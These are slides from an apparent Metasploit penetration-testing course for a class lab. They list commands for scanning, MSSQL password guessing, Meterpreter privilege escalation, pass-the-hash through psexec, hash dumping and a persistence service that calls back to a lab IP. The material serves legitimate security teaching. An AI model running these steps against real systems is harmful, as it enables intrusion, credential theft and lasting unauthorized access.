  • 22. Metasploit and Databases Metasploit supports MySQL and PostgreSQL /etc/init.d/postgresql-8.4 start (starts PostgeSQL) msf > db_connect postgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)
  • 23. Portscanning Queries a host to see if a program is listening Ex: Browsing to a website – webserver listens on port 80 Listening ports are accessible by an attacker and if vulnerable may be used for exploitation Ex: ms08_067_netapi exploits smb on port 445
  • 24. Metasploit and nmap Port scanning and just about everything else http://nmap.org/ man nmap Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1) msf > db_import subnet1.xml
  • 25. MSF Axillary Portscanners msf > search portscan (shows portscan modules) scanner/portscan/tcp (runs a TCP syn scan) Use auxiliary modules like exploits (use, set, exploit, etc.)
  • 26. Some Other MSF Scanners scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version) scanner/ssh/ssh_version (queries the ssh version) scanner/ftp/anonymous (anonymous ftp login)
  • 27. Vulnerability Scanning Query systems for potential vulnerabilities Identify potential methods of penetration Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
  • 28. Metasploit and Nessus Tenable's Vulnerability Scanner (http://www.nessus.org) msf>load nessus msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok) msf > nessus_policy_list msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage) msf> nessus_report_list msf> nessus_report_get <report id>
  • 29. Metasploit Vulnerability Scanners SMB Login Given a set of credentials what systems can they access? scanner/smb/smb_login Open VNC and X11 If misconfigured may be accessible without credentials scanner/vnc/vnc_none_auth scanner/x11/open_x11
  • 30. Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
  • 31. Our Database hosts services vulns -c select columns -s search for specific string
  • 32. db_autopwn By default just runs all the exploits that match a given open port Not stealthy Using vulnerability data can be made smarter, matches vulnerabilities instead of ports db_autopwn -x -e
  • 33. Attacking MSSQL MSSQL TCP port can change, UDP port is 1434 msf> search mssql (shows all mssql modules) msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port) msf> use scanner/mssql/mssql_login (tries passwords to log into mssql) msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
  • 34. We have a shell, now what? Privilege escalation Local information gathering Exploiting additional hosts Maintaining access Forensic avoidance
  • 35. Meterpreter: Privilege Escalation A session has the privileges of the exploited process getuid (tells you what user your session is running as) getsystem (tries various techniques to escalate privileges)
  • 36. Meterpreter: Enabling Remote Desktop Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group run getgui –e
  • 37. Meterpreter: Migrating If the process that hosts meterpreter closes meterpreter dies too Example: client side exploit residing in the browser meterpreter> ps (shows all processes) meterpreter> migrate <process id> (moves to a new process)
  • 38. Meterpreter: Searching for Content Look for specific interesting files on the exploited system search -h Example: search -f *.jpg (finds all the porn)
  • 39. Pivoting Scenario: Exploit a dual networked host, with a routeable interface and non routable one. Can we attack other hosts on the non routeable interface without SSH tunneling? Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1) Now you can portscan, exploit, etc. the non routable subnet
  • 40. PSExec hashdump (dumps the hashes, not always easy to crack) Why not just pass the hash to other systems? use windows/smb/psexec set SMBPass to the hash
  • 41. Meterpreter: Persistence Persistence script installs a meterpreter service Meterpreter comes back when the box restarts Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
  • 42. Exercises Perform a penetration test on the Windows and Linux systems we used in class Perform a penetration test on the lab network
  • 43. Contact Georgia Weidman Website: http://www.grmn00bs.com http://www.georgiaweidman.com Email: georgia@grmn00bs.com Twitter: @vincentkadmon